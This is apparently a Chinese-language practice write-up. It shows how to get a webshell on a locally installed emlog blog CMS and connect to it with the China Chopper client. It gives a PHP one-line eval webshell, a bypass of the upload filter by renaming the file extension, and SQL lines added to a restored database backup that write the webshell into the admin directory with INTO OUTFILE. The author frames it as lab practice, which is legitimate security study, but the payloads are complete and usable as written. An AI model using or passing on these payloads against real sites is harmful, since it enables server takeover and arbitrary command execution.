2019-11-7:练习上传getshell，通过菜刀连接

一、使用phtstudy搭建环境

1,将emlog源码解压到phpstudy的www目录，复制emlog源码中的src所有文件到需要搭建emlog的目录中，修改emlog配置文件，输入好本机mysql账户信息，之后访问emlog，根据情况设置填写信息

二、寻找上传文件路径，上传getshell

查询资料发现后台admin界面有个信息泄漏漏洞，get action=phpinfo可以得到phpinfo，成功getshell需要利用下

1，首页是没有上传按钮的，所以需要登录管理后台，登录之后在发布文章的地方有上传选项，允许类型有不少rar zip gif jpg jpeg png txt pdf docx doc xls xlsx

2，上传webshell，准备好一句话php文件,直接上传，提示文件类型错误，明显直接上传php文件不行

<?php eval(@_POST['aaa']);?>

3，修改成网站允许的文件后缀名之后尝试上传，发现只是修改文件后缀之后就可以上传成功，截图显示图是裂的没关系，因为是直接将php改后缀的没有图像数据所以是正常现象

4,上传成功之后，我以为可以直接getshell，发现自己天真了，到网站上传路径，发现所有上传的文件都只能是图片类型或其他类型，直接传脚本的方式不可行了，需要找其他方法

5，查找资料，发现后台有一个备份数据功能，还有导入本地备份功能，正式开始getshell

6，点击备份数据，将数据库的文件备份出来，在最后加入以下语句

Drop TABLE IF EXISTS emglog_shell;
create table emlog_shell(`cmd` text(999) not null);
INSERT INTO emlog_shell VALUES ('<?php @eval($_POST["aaa"]);?>');
Select cmd from emlog_shell into outfile 'D:/phpstudy_pro/WWW/emlog/admin/shell.php';
Drop TABLE IF EXISTS emglog_shell;

7，导入数据，发现成功导入shell.php

8,菜刀配置连接，成功getshell